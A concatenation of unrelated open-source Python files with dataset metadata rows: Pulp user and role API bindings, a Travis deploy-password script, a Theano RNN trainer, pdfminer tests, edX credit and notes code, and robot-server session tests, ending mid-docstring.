potentially modified/dirty in the user's editor), then it is returned,
otherwise the file is read from disk (assuming a UTF-8 encoding) and its
contents returned."""
file_data = request_data[ 'file_data' ]
if filename in file_data:
return ToUnicode( file_data[ filename ][ 'contents' ] )
return ToUnicode( ReadFile( filename ) )
| gpl-3.0 | 4,772,879,747,813,162,000 | 36.324219 | 80 | 0.632548 | false |
beav/pulp | bindings/pulp/bindings/auth.py | 2 | 4622 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public
# License as published by the Free Software Foundation; either version
# 2 of the License (GPLv2) or (at your option) any later version.
# There is NO WARRANTY for this software, express or implied,
# including the implied warranties of MERCHANTABILITY,
# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should
# have received a copy of GPLv2 along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
from pulp.bindings.base import PulpAPI
from pulp.bindings.search import SearchAPI
class UserAPI(PulpAPI):
"""
Connection class to access user specific calls
"""
def __init__(self, pulp_connection):
super(UserAPI, self).__init__(pulp_connection)
self.base_path = "/v2/users/"
def users(self):
path = self.base_path
return self.server.GET(path)
def create(self, login, password, name=None, roles=None):
path = self.base_path
userdata = {"login": login,
"password": password,
"name": name,
"roles": roles,}
return self.server.POST(path, userdata)
def user(self, login):
path = self.base_path + ("%s/" % login)
return self.server.GET(path)
def delete(self, login):
path = self.base_path + "%s/" % login
return self.server.DELETE(path)
def update(self, login, delta):
path = self.base_path + "%s/" % login
body = {'delta' : delta}
return self.server.PUT(path, body)
class UserSearchAPI(SearchAPI):
PATH = '/v2/users/search/'
class RoleAPI(PulpAPI):
"""
Connection class to access role specific calls
"""
def __init__(self, pulp_connection):
super(RoleAPI, self).__init__(pulp_connection)
self.base_path = "/v2/roles/"
def roles(self):
path = self.base_path
return self.server.GET(path)
def create(self, role_id, display_name=None, description=None):
path = self.base_path
roledata = {"role_id": role_id,
"display_name": display_name,
"description": description}
return self.server.POST(path, roledata)
def role(self, role_id):
path = self.base_path + ("%s/" % role_id)
return self.server.GET(path)
def delete(self, role_id):
path = self.base_path + "%s/" % role_id
return self.server.DELETE(path)
def update(self, role_id, delta):
path = self.base_path + "%s/" % role_id
body = {'delta' : delta}
return self.server.PUT(path, body)
def add_user(self, role_id, login):
path = self.base_path + "%s/" % role_id + 'users/'
data = {"login": login}
return self.server.POST(path, data)
def remove_user(self, role_id, login):
path = self.base_path + "%s/" % role_id + 'users/' + "%s/" % login
return self.server.DELETE(path)
class PermissionAPI(PulpAPI):
"""
Connection class to access permission specific calls
"""
def __init__(self, pulp_connection):
super(PermissionAPI, self).__init__(pulp_connection)
self.base_path = "/v2/permissions/"
def permission(self, resource):
path = self.base_path
query_parameters = {'resource' : resource}
return self.server.GET(path, query_parameters)
def grant_to_user(self, resource, login, operations):
path = self.base_path + "actions/grant_to_user/"
data = {"resource": resource,
"login": login,
"operations": operations}
return self.server.POST(path, data)
def grant_to_role(self, resource, role_id, operations):
path = self.base_path + "actions/grant_to_role/"
data = {"resource": resource,
"role_id": role_id,
"operations": operations}
return self.server.POST(path, data)
def revoke_from_user(self, resource, login, operations):
path = self.base_path + "actions/revoke_from_user/"
data = {"resource": resource,
"login": login,
"operations": operations}
return self.server.POST(path, data)
def revoke_from_role(self, resource, role_id, operations):
path = self.base_path + "actions/revoke_from_role/"
data = {"resource": resource,
"role_id": role_id,
"operations": operations}
return self.server.POST(path, data)
| gpl-2.0 | -343,089,840,848,470,400 | 33.485075 | 75 | 0.592729 | false |
Trax-air/swagger-stub | travis_pypi_setup.py | 1 | 3768 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Update encrypted deploy password in Travis config file
"""
from __future__ import print_function
import base64
import json
import os
from getpass import getpass
import yaml
from cryptography.hazmat.primitives.serialization import load_pem_public_key
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
try:
from urllib import urlopen
except ImportError:
from urllib.request import urlopen
GITHUB_REPO = 'Trax-Air/swagger_stub'
TRAVIS_CONFIG_FILE = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.travis.yml')
def load_key(pubkey):
"""Load public RSA key, with work-around for keys using
incorrect header/footer format.
Read more about RSA encryption with cryptography:
https://cryptography.io/latest/hazmat/primitives/asymmetric/rsa/
"""
try:
return load_pem_public_key(pubkey.encode(), default_backend())
except ValueError:
# workaround for https://github.com/travis-ci/travis-api/issues/196
pubkey = pubkey.replace('BEGIN RSA', 'BEGIN').replace('END RSA', 'END')
return load_pem_public_key(pubkey.encode(), default_backend())
def encrypt(pubkey, password):
"""Encrypt password using given RSA public key and encode it with base64.
The encrypted password can only be decrypted by someone with the
private key (in this case, only Travis).
"""
key = load_key(pubkey)
encrypted_password = key.encrypt(password, PKCS1v15())
return base64.b64encode(encrypted_password)
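# Hedged example of how these helpers combine (added; the repo slug and
# password below are placeholders, not real values):
#
# pubkey = fetch_public_key('some-org/some-repo')
# secure = encrypt(pubkey, b'pypi-password')
# # 'secure' is the base64 blob stored under deploy.password.secure in
# # .travis.yml by update_travis_deploy_password() below.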
def fetch_public_key(repo):
"""Download RSA public key Travis will use for this repo.
Travis API docs: http://docs.travis-ci.com/api/#repository-keys
"""
keyurl = 'https://api.travis-ci.org/repos/{0}/key'.format(repo)
data = json.loads(urlopen(keyurl).read().decode())
if 'key' not in data:
errmsg = "Could not find public key for repo: {}.\n".format(repo)
errmsg += "Have you already added your GitHub repo to Travis?"
raise ValueError(errmsg)
return data['key']
def prepend_line(filepath, line):
"""Rewrite a file adding a line to its beginning.
"""
with open(filepath) as f:
lines = f.readlines()
lines.insert(0, line)
with open(filepath, 'w') as f:
f.writelines(lines)
def load_yaml_config(filepath):
with open(filepath) as f:
return yaml.safe_load(f)
def save_yaml_config(filepath, config):
with open(filepath, 'w') as f:
yaml.dump(config, f, default_flow_style=False)
def update_travis_deploy_password(encrypted_password):
"""Update the deploy section of the .travis.yml file
to use the given encrypted password.
"""
config = load_yaml_config(TRAVIS_CONFIG_FILE)
config['deploy']['password'] = dict(secure=encrypted_password)
save_yaml_config(TRAVIS_CONFIG_FILE, config)
line = ('# This file was autogenerated and will overwrite'
' each time you run travis_pypi_setup.py\n')
prepend_line(TRAVIS_CONFIG_FILE, line)
def main(args):
public_key = fetch_public_key(args.repo)
password = args.password or getpass('PyPI password: ')
update_travis_deploy_password(encrypt(public_key, password.encode()))
print("Wrote encrypted password to .travis.yml -- you're ready to deploy")
if '__main__' == __name__:
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--repo', default=GITHUB_REPO,
help='GitHub repo (default: {0!s})'.format(GITHUB_REPO))
parser.add_argument('--password',
help='PyPI password (will prompt if not provided)')
args = parser.parse_args()
main(args)
| mit | 5,696,835,382,458,828,000 | 29.885246 | 80 | 0.679406 | false |
wangyarui/deep-learning | rnn/train-theano.py | 1 | 3943 | #! /usr/bin/env python
import csv
import itertools
import operator
import numpy as np
import nltk
import sys
import os
import time
from datetime import datetime
from utils import *
from rnn_theano import RNNTheano
_VOCABULARY_SIZE = int(os.environ.get('VOCABULARY_SIZE', '8000'))
_HIDDEN_DIM = int(os.environ.get('HIDDEN_DIM', '80'))
_LEARNING_RATE = float(os.environ.get('LEARNING_RATE', '0.005'))
_NEPOCH = int(os.environ.get('NEPOCH', '100'))
_MODEL_FILE = os.environ.get('MODEL_FILE')
def train_with_sgd(model, X_train, y_train, learning_rate=0.005, nepoch=1, evaluate_loss_after=5):
# We keep track of the losses so we can plot them later
losses = []
num_examples_seen = 0
for epoch in range(nepoch):
# Optionally evaluate the loss
if (epoch % evaluate_loss_after == 0):
loss = model.calculate_loss(X_train, y_train)
losses.append((num_examples_seen, loss))
time = datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
print "%s: Loss after num_examples_seen=%d epoch=%d: %f" % (time, num_examples_seen, epoch, loss)
# Adjust the learning rate if loss increases
if (len(losses) > 1 and losses[-1][1] > losses[-2][1]):
learning_rate = learning_rate * 0.5
print "Setting learning rate to %f" % learning_rate
sys.stdout.flush()
# ADDED! Saving model parameters
save_model_parameters_theano("./data/rnn-theano-%d-%d-%s.npz" % (model.hidden_dim, model.word_dim, time), model)
# For each training example...
for i in range(len(y_train)):
# One SGD step
model.sgd_step(X_train[i], y_train[i], learning_rate)
num_examples_seen += 1
vocabulary_size = _VOCABULARY_SIZE
unknown_token = "UNKNOWN_TOKEN"
sentence_start_token = "SENTENCE_START"
sentence_end_token = "SENTENCE_END"
# Read the data and append SENTENCE_START and SENTENCE_END tokens
print "Reading CSV file..."
with open('data/reddit-comments-2015-08.csv', 'rb') as f:
reader = csv.reader(f, skipinitialspace=True)
reader.next()
# Split full comments into sentences
sentences = itertools.chain(*[nltk.sent_tokenize(x[0].decode('utf-8').lower()) for x in reader])
# Append SENTENCE_START and SENTENCE_END
sentences = ["%s %s %s" % (sentence_start_token, x, sentence_end_token) for x in sentences]
print "Parsed %d sentences." % (len(sentences))
# Tokenize the sentences into words
tokenized_sentences = [nltk.word_tokenize(sent) for sent in sentences]
# Count the word frequencies
word_freq = nltk.FreqDist(itertools.chain(*tokenized_sentences))
print "Found %d unique words tokens." % len(word_freq.items())
# Get the most common words and build index_to_word and word_to_index vectors
vocab = word_freq.most_common(vocabulary_size-1)
index_to_word = [x[0] for x in vocab]
index_to_word.append(unknown_token)
word_to_index = dict([(w,i) for i,w in enumerate(index_to_word)])
print "Using vocabulary size %d." % vocabulary_size
print "The least frequent word in our vocabulary is '%s' and appeared %d times." % (vocab[-1][0], vocab[-1][1])
# Replace all words not in our vocabulary with the unknown token
for i, sent in enumerate(tokenized_sentences):
tokenized_sentences[i] = [w if w in word_to_index else unknown_token for w in sent]
# Create the training data
X_train = np.asarray([[word_to_index[w] for w in sent[:-1]] for sent in tokenized_sentences])
y_train = np.asarray([[word_to_index[w] for w in sent[1:]] for sent in tokenized_sentences])
model = RNNTheano(vocabulary_size, hidden_dim=_HIDDEN_DIM)
t1 = time.time()
model.sgd_step(X_train[10], y_train[10], _LEARNING_RATE)
t2 = time.time()
print "SGD Step time: %f milliseconds" % ((t2 - t1) * 1000.)
if _MODEL_FILE is not None:
load_model_parameters_theano(_MODEL_FILE, model)
train_with_sgd(model, X_train, y_train, nepoch=_NEPOCH, learning_rate=_LEARNING_RATE)
| unlicense | 4,335,853,474,409,367,600 | 40.505263 | 124 | 0.673852 | false |
pdfminer/pdfminer.six | tests/test_pdfminer_psparser.py | 2 | 3053 | import logging
from nose.tools import assert_equal
from pdfminer.psparser import KWD, LIT, PSBaseParser, PSStackParser, PSEOF
logger = logging.getLogger(__name__)
class TestPSBaseParser:
"""Simplistic Test cases"""
TESTDATA = br'''%!PS
begin end
" @ #
/a/BCD /Some_Name /foo#5f#xbaa
0 +1 -2 .5 1.234
(abc) () (abc ( def ) ghi)
(def\040\0\0404ghi) (bach\\slask) (foo\nbaa)
(this % is not a comment.)
(foo
baa)
(foo\
baa)
<> <20> < 40 4020 >
<abcd00
12345>
func/a/b{(c)do*}def
[ 1 (z) ! ]
<< /foo (bar) >>
'''
TOKENS = [
(5, KWD(b'begin')), (11, KWD(b'end')), (16, KWD(b'"')),
(19, KWD(b'@')), (21, KWD(b'#')), (23, LIT('a')), (25, LIT('BCD')),
(30, LIT('Some_Name')), (41, LIT('foo_xbaa')), (54, 0), (56, 1),
(59, -2), (62, 0.5), (65, 1.234), (71, b'abc'), (77, b''),
(80, b'abc ( def ) ghi'), (98, b'def \x00 4ghi'),
(118, b'bach\\slask'), (132, b'foo\nbaa'),
(143, b'this % is not a comment.'), (170, b'foo\nbaa'),
(180, b'foobaa'), (191, b''), (194, b' '), (199, b'@@ '),
(211, b'\xab\xcd\x00\x124\x05'), (226, KWD(b'func')), (230, LIT('a')),
(232, LIT('b')), (234, KWD(b'{')), (235, b'c'), (238, KWD(b'do*')),
(241, KWD(b'}')), (242, KWD(b'def')), (246, KWD(b'[')), (248, 1),
(250, b'z'), (254, KWD(b'!')), (256, KWD(b']')), (258, KWD(b'<<')),
(261, LIT('foo')), (266, b'bar'), (272, KWD(b'>>'))
]
OBJS = [
(23, LIT('a')), (25, LIT('BCD')), (30, LIT('Some_Name')),
(41, LIT('foo_xbaa')), (54, 0), (56, 1), (59, -2), (62, 0.5),
(65, 1.234), (71, b'abc'), (77, b''), (80, b'abc ( def ) ghi'),
(98, b'def \x00 4ghi'), (118, b'bach\\slask'), (132, b'foo\nbaa'),
(143, b'this % is not a comment.'), (170, b'foo\nbaa'),
(180, b'foobaa'), (191, b''), (194, b' '), (199, b'@@ '),
(211, b'\xab\xcd\x00\x124\x05'), (230, LIT('a')), (232, LIT('b')),
(234, [b'c']), (246, [1, b'z']), (258, {'foo': b'bar'}),
]
def get_tokens(self, s):
from io import BytesIO
class MyParser(PSBaseParser):
def flush(self):
self.add_results(*self.popall())
parser = MyParser(BytesIO(s))
r = []
try:
while True:
r.append(parser.nexttoken())
except PSEOF:
pass
return r
def get_objects(self, s):
from io import BytesIO
class MyParser(PSStackParser):
def flush(self):
self.add_results(*self.popall())
parser = MyParser(BytesIO(s))
r = []
try:
while True:
r.append(parser.nextobject())
except PSEOF:
pass
return r
def test_1(self):
tokens = self.get_tokens(self.TESTDATA)
logger.info(tokens)
assert_equal(tokens, self.TOKENS)
return
def test_2(self):
objs = self.get_objects(self.TESTDATA)
logger.info(objs)
assert_equal(objs, self.OBJS)
return
| mit | 7,970,602,359,698,973,000 | 28.931373 | 79 | 0.47396 | false |
edx/edx-platform | openedx/core/djangoapps/credit/services.py | 3 | 7489 | """
Implementation of "credit" XBlock service
"""
import logging
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core.exceptions import ObjectDoesNotExist
from opaque_keys.edx.keys import CourseKey
from common.djangoapps.student.models import CourseEnrollment
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
log = logging.getLogger(__name__)
def _get_course_key(course_key_or_id):
"""
Helper method to get a course key either from a string or a CourseKey,
where the CourseKey will simply be returned
"""
return (
CourseKey.from_string(course_key_or_id)
if isinstance(course_key_or_id, str)
else course_key_or_id
)
class CreditService:
"""
Course Credit XBlock service
"""
def is_credit_course(self, course_key_or_id):
"""
Returns boolean if the passed in course_id (string) or course_key is
a credit_course
"""
# This seems to need to be here otherwise we get
# circular references when starting up the app
from openedx.core.djangoapps.credit.api.eligibility import (
is_credit_course,
)
course_key = _get_course_key(course_key_or_id)
return is_credit_course(course_key)
def get_credit_state(self, user_id, course_key_or_id, return_course_info=False):
"""
Return all information about the user's credit state inside of a given
course.
ARGS:
- user_id: The PK of the User in question
- course_key: The course ID (as string or CourseKey)
RETURNS:
NONE (user not found or is not enrolled or is not credit course)
- or -
{
'enrollment_mode': the mode that the user is enrolled in the course
'profile_fullname': the name that the student registered under, used for verification
'is_credit_course': if the course has been marked as a credit bearing course
'credit_requirement_status': the user's status in fulfilling those requirements
'course_name': optional display name of the course
'course_end_date': optional end date of the course
}
"""
# This seems to need to be here otherwise we get
# circular references when starting up the app
from openedx.core.djangoapps.credit.api.eligibility import (
is_credit_course,
get_credit_requirement_status,
)
# since we have to do name matching during various
# verifications, User must have a UserProfile
try:
user = User.objects.select_related('profile').get(id=user_id)
except ObjectDoesNotExist:
# bad user_id
return None
course_key = _get_course_key(course_key_or_id)
enrollment = CourseEnrollment.get_enrollment(user, course_key)
if not enrollment or not enrollment.is_active:
# not enrolled
return None
result = {
'enrollment_mode': enrollment.mode,
'profile_fullname': user.profile.name,
'student_email': user.email,
'is_credit_course': is_credit_course(course_key),
'credit_requirement_status': get_credit_requirement_status(course_key, user.username)
}
if return_course_info:
course_overview = CourseOverview.get_from_id(course_key)
result.update({
'course_name': course_overview.display_name,
'course_end_date': course_overview.end,
})
return result
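# Illustrative use from an XBlock runtime (added as a sketch; assumes the
# service is registered under the name 'credit', which may differ):
#
# credit_service = self.runtime.service(self, 'credit')
# state = credit_service.get_credit_state(user_id, course_key, return_course_info=True)
# if state and state['is_credit_course']:
# ... # inspect state['credit_requirement_status']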
def set_credit_requirement_status(self, user_id, course_key_or_id, req_namespace,
req_name, status="satisfied", reason=None):
"""
A simple wrapper around the method of the same name in api.eligibility.py. The only difference is
that a user_id is passed in.
For more information, see documentation on this method name in api.eligibility.py
"""
# This seems to need to be here otherwise we get
# circular references when starting up the app
from openedx.core.djangoapps.credit.api.eligibility import (
is_credit_course,
set_credit_requirement_status as api_set_credit_requirement_status
)
course_key = _get_course_key(course_key_or_id)
# quick exit, if course is not credit enabled
if not is_credit_course(course_key):
return
# always log any update activity to the credit requirements
# table. This will be to help debug any issues that might
# arise in production
log_msg = (
'set_credit_requirement_status was called with '
'user_id={user_id}, course_key_or_id={course_key_or_id} '
'req_namespace={req_namespace}, req_name={req_name}, '
'status={status}, reason={reason}'.format(
user_id=user_id,
course_key_or_id=course_key_or_id,
req_namespace=req_namespace,
req_name=req_name,
status=status,
reason=reason
)
)
log.info(log_msg)
# need to get user_name from the user object
try:
user = User.objects.get(id=user_id)
except ObjectDoesNotExist:
return None
api_set_credit_requirement_status(
user,
course_key,
req_namespace,
req_name,
status,
reason
)
def remove_credit_requirement_status(self, user_id, course_key_or_id, req_namespace, req_name):
"""
A simple wrapper around the method of the same name in
api.eligibility.py. The only difference is that a user_id
is passed in.
For more information, see documentation on this method name
in api.eligibility.py
"""
# This seems to need to be here otherwise we get
# circular references when starting up the app
from openedx.core.djangoapps.credit.api.eligibility import (
is_credit_course,
remove_credit_requirement_status as api_remove_credit_requirement_status
)
course_key = _get_course_key(course_key_or_id)
# quick exit, if course is not credit enabled
if not is_credit_course(course_key):
return
# always log any deleted activity to the credit requirements
# table. This will be to help debug any issues that might
# arise in production
log_msg = (
'remove_credit_requirement_status was called with '
'user_id={user_id}, course_key_or_id={course_key_or_id} '
'req_namespace={req_namespace}, req_name={req_name}, '.format(
user_id=user_id,
course_key_or_id=course_key_or_id,
req_namespace=req_namespace,
req_name=req_name
)
)
log.info(log_msg)
# need to get user_name from the user object
try:
user = User.objects.get(id=user_id)
except ObjectDoesNotExist:
return None
api_remove_credit_requirement_status(
user.username,
course_key,
req_namespace,
req_name
)
| agpl-3.0 | 1,703,073,508,382,825,700 | 33.995327 | 105 | 0.59741 | false |
OpenTrons/opentrons-api | robot-server/tests/service/session/test_router.py | 2 | 14869 | import pytest
from unittest.mock import MagicMock, patch
from datetime import datetime
import typing
from pydantic.main import BaseModel
from robot_server.service.dependencies import get_session_manager
from robot_server.service.session.command_execution import CommandExecutor, \
Command
from robot_server.service.session.command_execution.command import \
CommandResult, CompletedCommand, CommandContent, CommandMeta, CommandStatus
from robot_server.service.session.errors import SessionCreationException, \
UnsupportedCommandException, CommandExecutionException
from robot_server.service.session.models.common import EmptyModel, JogPosition
from robot_server.service.session.models.command import CalibrationCommand
from robot_server.service.session.models.session import SessionType
from robot_server.service.session.session_types import NullSession, \
SessionMetaData
@pytest.fixture
def mock_session_meta():
return SessionMetaData(identifier="some_id",
created_at=datetime(2000, 1, 1, 0, 0, 0))
@pytest.fixture
def session_response(mock_session_meta):
return {
'attributes': {
'details': {
},
'sessionType': 'null',
'createdAt': mock_session_meta.created_at.isoformat(),
'createParams': None,
},
'type': 'Session',
'id': mock_session_meta.identifier
}
@pytest.fixture
def command_id():
return "123"
@pytest.fixture
def command_created_at():
return datetime(2000, 1, 1)
@pytest.fixture
def patch_create_command(command_id, command_created_at):
with patch("robot_server.service.session.router.create_command") as p:
p.side_effect = lambda c, n: Command(
content=CommandContent(c, n),
meta=CommandMeta(command_id, command_created_at))
yield p
@pytest.fixture
def mock_command_executor():
mock = MagicMock(spec=CommandExecutor)
async def func(command):
return CompletedCommand(content=command.content,
meta=command.meta,
result=CommandResult(
status=CommandStatus.executed,
started_at=datetime(2019, 1, 1),
completed_at=datetime(2020, 1, 1))
)
mock.execute.side_effect = func
return mock
@pytest.fixture
def mock_session(mock_session_meta, mock_command_executor):
session = NullSession(configuration=MagicMock(),
instance_meta=mock_session_meta)
session._command_executor = mock_command_executor
async def func(*args, **kwargs):
pass
session.clean_up = MagicMock(side_effect=func)
return session
@pytest.fixture
def patch_create_session(mock_session):
r = "robot_server.service.session.session_types.BaseSession.create"
with patch(r) as p:
async def mock_build(*args, **kwargs):
return mock_session
p.side_effect = mock_build
yield p
@pytest.fixture
@pytest.mark.asyncio
async def session_manager_with_session(loop, patch_create_session):
manager = get_session_manager()
session = await manager.add(SessionType.null, SessionMetaData())
yield manager
await manager.remove(session.meta.identifier)
def test_create_session_error(api_client,
patch_create_session):
async def raiser(*args, **kwargs):
raise SessionCreationException(
"Please attach pipettes before proceeding"
)
patch_create_session.side_effect = raiser
response = api_client.post("/sessions", json={
"data": {
"type": "Session",
"attributes": {
"sessionType": "null"
}
}
})
assert response.json() == {
'errors': [{
'detail': "Please attach pipettes before proceeding",
'status': '403',
'title': 'Action Forbidden'}
]}
assert response.status_code == 403
def test_create_session(api_client,
patch_create_session,
mock_session_meta,
session_response):
response = api_client.post("/sessions", json={
"data": {
"type": "Session",
"attributes": {
"sessionType": "null"
}
}
})
assert response.json() == {
'data': session_response,
'links': {
'commandExecute': {
'href': f'/sessions/{mock_session_meta.identifier}/commands/execute', # noqa: E501
},
'self': {
'href': f'/sessions/{mock_session_meta.identifier}',
},
'sessions': {
'href': '/sessions'
},
'sessionById': {
'href': '/sessions/{sessionId}'
}
}
}
assert response.status_code == 201
# Clean up
get_session_manager()._sessions = {}
def test_delete_session_not_found(api_client):
response = api_client.delete("/sessions/check")
assert response.json() == {
'errors': [{
'detail': "Resource type 'session' with id 'check' was not found",
'links': {
'self': {'href': '/sessions'},
'sessionById': {'href': '/sessions/{sessionId}'}
},
'status': '404',
'title': 'Resource Not Found'
}]
}
assert response.status_code == 404
def test_delete_session(api_client,
session_manager_with_session,
mock_session,
mock_session_meta,
session_response):
response = api_client.delete(f"/sessions/{mock_session_meta.identifier}")
# mock_session.clean_up.assert_called_once()
assert response.json() == {
'data': session_response,
'links': {
'self': {
'href': '/sessions',
},
'sessionById': {
'href': '/sessions/{sessionId}'
},
}
}
assert response.status_code == 200
def test_get_session_not_found(api_client):
response = api_client.get("/sessions/1234")
assert response.json() == {
'errors': [{
'detail': "Resource type 'session' with id '1234' was not found",
'links': {
'self': {'href': '/sessions'},
'sessionById': {'href': '/sessions/{sessionId}'}
},
'status': '404',
'title': 'Resource Not Found'
}]
}
assert response.status_code == 404
def test_get_session(api_client,
mock_session_meta,
session_manager_with_session,
session_response):
response = api_client.get(f"/sessions/{mock_session_meta.identifier}")
assert response.json() == {
'data': session_response,
'links': {
'commandExecute': {
'href': f'/sessions/{mock_session_meta.identifier}/commands/execute', # noqa: E501
},
'self': {
'href': f'/sessions/{mock_session_meta.identifier}',
},
'sessions': {
'href': '/sessions'
},
'sessionById': {
'href': '/sessions/{sessionId}'
}
}
}
assert response.status_code == 200
def test_get_sessions_no_sessions(api_client):
response = api_client.get("/sessions")
assert response.json() == {
'data': [],
}
assert response.status_code == 200
def test_get_sessions(api_client,
session_manager_with_session,
session_response):
response = api_client.get("/sessions")
assert response.json() == {
'data': [session_response],
}
assert response.status_code == 200
def command(command_type: str, body: typing.Optional[BaseModel]):
"""Helper to create command"""
return {
"data": {
"type": "SessionCommand",
"attributes": {
"command": command_type,
"data": body.dict(exclude_unset=True) if body else {}
}
}
}
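# For reference (added; not part of the original tests), the helper above
# builds a JSON API style request body, e.g.:
#
# command("calibration.jog", JogPosition(vector=(1, 2, 3)))
# # {"data": {"type": "SessionCommand",
# # "attributes": {"command": "calibration.jog",
# # "data": {"vector": (1, 2, 3)}}}}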
def test_execute_command_no_session(api_client, mock_session_meta):
"""Test that command is rejected if there's no session"""
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("jog",
JogPosition(vector=(1, 2, 3,))))
assert response.json() == {
'errors': [{
'detail': f"Resource type 'session' with id '{mock_session_meta.identifier}' was not found", # noqa: e5011
'links': {
'self': {'href': '/sessions'},
'sessionById': {'href': '/sessions/{sessionId}'}
},
'status': '404',
'title': 'Resource Not Found'
}]
}
assert response.status_code == 404
def test_execute_command(api_client,
session_manager_with_session,
mock_session_meta,
mock_command_executor,
command_id,
command_created_at,
patch_create_command):
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("calibration.jog",
JogPosition(vector=(1, 2, 3,))))
mock_command_executor.execute.assert_called_once_with(
Command(
content=CommandContent(
name=CalibrationCommand.jog,
data=JogPosition(vector=(1, 2, 3,))
),
meta=CommandMeta(identifier=command_id,
created_at=command_created_at)
)
)
assert response.json() == {
'data': {
'attributes': {
'command': 'calibration.jog',
'data': {'vector': [1.0, 2.0, 3.0]},
'status': 'executed',
'createdAt': '2000-01-01T00:00:00',
'startedAt': '2019-01-01T00:00:00',
'completedAt': '2020-01-01T00:00:00',
},
'type': 'SessionCommand',
'id': command_id,
},
'links': {
'commandExecute': {
'href': f'/sessions/{mock_session_meta.identifier}/commands/execute', # noqa: E501
},
'self': {
'href': f'/sessions/{mock_session_meta.identifier}',
},
'sessions': {
'href': '/sessions'
},
'sessionById': {
'href': '/sessions/{sessionId}'
},
}
}
assert response.status_code == 200
def test_execute_command_no_body(api_client,
session_manager_with_session,
mock_session_meta,
patch_create_command,
command_id,
command_created_at,
mock_command_executor):
"""Test that a command with empty body can be accepted"""
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("calibration.loadLabware", None)
)
mock_command_executor.execute.assert_called_once_with(
Command(
content=CommandContent(
name=CalibrationCommand.load_labware,
data=EmptyModel()),
meta=CommandMeta(command_id, command_created_at)
)
)
assert response.json() == {
'data': {
'attributes': {
'command': 'calibration.loadLabware',
'data': {},
'status': 'executed',
'createdAt': '2000-01-01T00:00:00',
'startedAt': '2019-01-01T00:00:00',
'completedAt': '2020-01-01T00:00:00',
},
'type': 'SessionCommand',
'id': command_id
},
'links': {
'commandExecute': {
'href': f'/sessions/{mock_session_meta.identifier}/commands/execute', # noqa: E501
},
'self': {
'href': f'/sessions/{mock_session_meta.identifier}',
},
'sessions': {
'href': '/sessions'
},
'sessionById': {
'href': '/sessions/{sessionId}'
},
}
}
assert response.status_code == 200
@pytest.mark.parametrize(argnames="exception,expected_status",
argvalues=[
[UnsupportedCommandException, 403],
[CommandExecutionException, 403],
])
def test_execute_command_error(api_client,
session_manager_with_session,
mock_session_meta,
mock_command_executor,
exception,
expected_status):
"""Test that we handle executor errors correctly"""
async def raiser(*args, **kwargs):
raise exception("Cannot do it")
mock_command_executor.execute.side_effect = raiser
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("jog",
JogPosition(vector=(1, 2, 3,)))
)
assert response.json() == {
'errors': [
{
'detail': 'Cannot do it',
'status': f'{expected_status}',
'title': 'Action Forbidden'
}
]
}
assert response.status_code == expected_status
def test_execute_command_session_inactive(
api_client,
session_manager_with_session,
mock_session_meta,
mock_command_executor):
"""Test that only the active session can execute commands"""
session_manager_with_session._active.active_id = None
response = api_client.post(
f"/sessions/{mock_session_meta.identifier}/commands/execute",
json=command("jog",
JogPosition(vector=(1, 2, 3,)))
)
assert response.json() == {
'errors': [
{
'title': 'Action Forbidden',
'status': '403',
'detail': f"Session '{mock_session_meta.identifier}'"
f" is not active. Only the active session can "
f"execute commands"
}
]
}
assert response.status_code == 403
| apache-2.0 | -8,265,883,172,919,127,000 | 30.569002 | 119 | 0.521689 | false |
angelapper/edx-platform | lms/djangoapps/edxnotes/views.py | 5 | 6721 | """
Views related to EdxNotes.
"""
import json
import logging
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.http import Http404, HttpResponse
from django.views.decorators.http import require_GET
from opaque_keys.edx.keys import CourseKey
from courseware.courses import get_course_with_access
from courseware.model_data import FieldDataCache
from courseware.module_render import get_module_for_descriptor
from edxmako.shortcuts import render_to_response
from edxnotes.exceptions import EdxNotesParseError, EdxNotesServiceUnavailable
from edxnotes.helpers import (
DEFAULT_PAGE,
DEFAULT_PAGE_SIZE,
NoteJSONEncoder,
get_course_position,
get_edxnotes_id_token,
get_notes,
is_feature_enabled
)
from util.json_request import JsonResponse, JsonResponseBadRequest
log = logging.getLogger(__name__)
@login_required
def edxnotes(request, course_id):
"""
Displays the EdxNotes page.
Arguments:
request: HTTP request object
course_id: course id
Returns:
Rendered HTTP response.
"""
course_key = CourseKey.from_string(course_id)
course = get_course_with_access(request.user, "load", course_key)
if not is_feature_enabled(course):
raise Http404
notes_info = get_notes(request, course)
has_notes = (len(notes_info.get('results')) > 0)
context = {
"course": course,
"notes_endpoint": reverse("notes", kwargs={"course_id": course_id}),
"notes": notes_info,
"page_size": DEFAULT_PAGE_SIZE,
"debug": settings.DEBUG,
'position': None,
'disabled_tabs': settings.NOTES_DISABLED_TABS,
'has_notes': has_notes,
}
if not has_notes:
field_data_cache = FieldDataCache.cache_for_descriptor_descendents(
course.id, request.user, course, depth=2
)
course_module = get_module_for_descriptor(
request.user, request, course, field_data_cache, course_key, course=course
)
position = get_course_position(course_module)
if position:
context.update({
'position': position,
})
return render_to_response("edxnotes/edxnotes.html", context)
@require_GET
@login_required
def notes(request, course_id):
"""
Notes view to handle list and search requests.
Query parameters:
page: page number to get
page_size: number of items in the page
text: text string to search. If `text` param is missing then get all the
notes for the current user for this course else get only those notes
which contain the `text` value.
Arguments:
request: HTTP request object
course_id: course id
Returns:
Paginated response as JSON. A sample response is below.
{
"count": 101,
"num_pages": 11,
"current_page": 1,
"results": [
{
"chapter": {
"index": 4,
"display_name": "About Exams and Certificates",
"location": "i4x://org/course/category/name@revision",
"children": [
"i4x://org/course/category/name@revision"
]
},
